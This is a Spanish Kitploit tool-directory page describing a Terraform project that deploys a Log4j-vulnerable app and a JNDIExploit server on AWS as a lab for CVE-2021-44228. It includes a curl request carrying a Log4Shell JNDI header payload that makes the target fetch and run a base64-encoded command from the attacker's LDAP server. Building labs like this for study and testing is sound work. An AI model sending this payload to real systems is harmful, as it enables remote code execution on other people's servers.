Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — Un Terraform para desplegar una aplicación vulnerable y un JDNIExploit para trabajar con CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
Seguridad de Infraestructura en la NubeGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Un Terraform para desplegar una aplicación vulnerable y un JDNIExploit para trabajar con CVE-2021-44228

Ver Repositorio
21hace 4 añosAún no revisado

log4j-vulnerable-app-cve-2021-44228-terraform

Un Terraform para desplegar una aplicación vulnerable y un JNDIExploit para trabajar con CVE-2021-44228

Acerca de la pila

Este terraform crea dos instancias en una VPC en AWS Cloud.

Solo necesitas exportar tus AWS_ACCESS_KEY_ID y AWS_SECRET_ACCESS_KEY

Una instancia es JNDIExploit.

La segunda es una Vulnerable-App para el exploit log4j

Por favor, reemplaza tu SSH-Public-Key en terraform antes de apply

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

Exploit

Después del despliegue en aws puedes explotarlo con una petición curl y verificar la creación de archivos en /tmp en el contenedor vulnerable-app.

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

En el servidor de la aplicación vulnerable ejecuta el siguiente comando para verificar la ejecución del comando, deberías ver el archivo pwned

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
Descargar herramienta